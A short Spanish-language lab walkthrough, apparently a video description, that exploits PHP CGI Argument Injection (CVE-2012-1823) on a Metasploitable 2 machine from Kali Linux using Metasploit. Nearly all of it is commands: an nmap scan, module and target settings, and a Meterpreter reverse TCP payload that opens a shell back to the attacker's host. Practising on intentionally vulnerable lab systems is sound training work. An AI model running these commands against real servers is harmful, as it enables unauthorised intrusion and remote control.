
En este video se realiza la explotación de PHP CGI Argument Injection (CVE-2012-1823) en el servidor Metasploitable 2 mediante Kali Linux usando Metasploit.
Determina la IP de Metasploitable desde Kali:
ip a
Por ejemplo:
Kali: 192.168.56.101
Metasploitable2: 192.168.56.102
Verificamos el puerto y el servicio:
nmap -p 80 192.168.56.102
También se puede verificar en el navegador:
msfconsole
search php cgi
El módulo correcto:
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS 192.168.56.102
set RPORT 80
set TARGETURI /
Seleccionamos el payload:
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444
Verificamos:
show options
run
o
exploit
Si tiene éxito:
Meterpreter session 1 opened
sysinfo
whoami